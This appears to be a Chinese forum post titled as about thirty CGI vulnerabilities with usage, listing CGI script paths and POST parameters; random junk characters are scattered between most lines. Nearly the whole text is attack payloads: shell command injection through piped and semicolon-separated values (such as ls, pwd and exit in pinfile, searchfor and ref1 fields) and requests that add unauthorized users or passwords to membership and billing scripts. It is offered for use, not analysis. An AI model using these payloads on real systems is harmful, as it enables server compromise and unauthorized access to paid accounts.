Cgi-bin 30个漏洞＋使用方法

admin

==============================
2 H9 r1 ]6 H: M! ?& F
/smspass.pl
username=username&password=password
% L) B- t  U* y  b3 I* P
0 V$ c- P( h9 u" @% Q/ ?/index.cgi
wei=ren&gen=command
, a1 V% Z- m0 ]$ s# q( \
/passmaster.cgi
$ E$ z+ k! `  H0 s" ]Action=Add&Username=Username&Password=Password

0 M0 |2 G  ^5 p- U* [! a$ p% ?" \/accountcreate.cgi
( M& c1 ~1 G$ v& k, Husername=username&password=password&ref1=|echo;ls|

; b4 Q8 O* l$ `" F& E+ V5 K/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|

/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password

/ccbill-local.asp
post_values=username:password

/count.cgi
pinfile=|echo;ls -la;exit|

) W6 i4 g5 U! O: x/recon.cgi
/recon.cgi?search
! z# Z* `8 H0 q! p6 c+ C) ysearchoption=1&searchfor=|echo;ls -al;exit|
3 y: k. T1 ^! _4 M/ {
/verotelrum.pl
' }- y1 W7 G  h+ Z2 fvercode=username:password:dseegsow:add:amount<&30>
, j, q$ W! a- e5 n' J, n0 S
/af.cgi
_browser_out=|echo;ls -la;exit;|
" e2 Q8 p% w' F
' E5 g$ l& |8 K0 m  ]5 [/modify.cgi
username=username&password=password&expire=30

/openjournal.cgi
% c: R8 f" E5 N  O9 L& Sedit=1&ct=2&go=|echo;ls -al;exit|
- ?% w( y3 ]3 f
/gx9passwd.cgi
0 h& J. @5 H$ dcmd=ADD&user=username&pass=password
4 D8 G: @- `+ Q( V5 `/ ?/ c) M; y
) v% }+ A' ~$ U9 |. k0 \) t4 Z3 I5 r/probecontrol.cgi
command=enable&username=username&password=password
2 a( K& P0 a& Q) Z: E5 g
2 I$ K  y# p! T3 _+ Z/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit

# O, M/ a) G( P3 M& u/htadd.pl
$ l- D$ h) W- p' r$ I7 s& aconfigfile=|echo; ls -alt; exit

: v% G' Q, V" C4 @1 v/gx9passwd.cgi
cmd=ADD&user=username&pass=password
7 x; X$ s4 @8 A6 g
/ibill*.pl
( j. N4 ~' ]# \, o" Preqtype=add&authpwd=authpwd&username=username&password=password
& q& W- M  V- Z, h
: r6 H2 w6 p% V: L# h. U. a1 B/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)

: I8 N! y1 X/ l; q3 G/globill_ut.cgi
do=add&username=username&password=password&wpassword=password
, n( y2 S  G- K( s% Y
# s, ]* x, A+ B/usercontrol.cgi
. F0 D; Z. Z8 c" e( rcommand=enable&username=USER&password=PASS
/ L5 \1 e$ z, t& j# a
: a6 y; W; @) W) a0 [/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password
( q& R8 `- K4 D
/addusr.pl
$ E  i0 f% O+ m' G! }0 wuser=USER&pass=PASS&confirm=PASS
0 Z" r$ S- W0 I
/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
  J  Z( @! O7 {' R, _/ Lpinfile=|echo;pwd;exit|
  u+ S" E& i3 @+ c! Z1 ~, S: v
. o7 D8 c$ f8 l+ M- e/accountcreate.cgi
9 j. ?2 A( a" u6 Q& B' w/cgi-bin/gateway/accountcreate.cgi
& p3 f0 I' _- V7 B$ G; ~2 }$ Uusername=username&password=password&password2=password&ref1=|echo;ls -al;exit

  {( E% m% f  c5 m" g" A/af.cgi
; L4 H, }; h8 ]6 E1 d/ z+ k/ h7 `& R' ^/env.cgi
ADD+;echo;pwd;exit
& {  }6 d  C$ T" m7 D; C7 L( e
/count.cgi
% ?: d- r  J1 h3 jpinfile=|echo;pwd;exit|
, c% K1 F0 w" y; T3 _
/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|
( B) _$ _+ r5 A  U% e# p
/add.cgi
: W! p" t1 h, M/ u0 \& Dusername=username&password=password&expire=30
6 c& h2 z9 {4 ~  f" ?
. Z- Y* r( ^$ m4 x6 Z) V==============================
1 `9 r; l% v" ]1 b5 I. Y8 h& k. p! |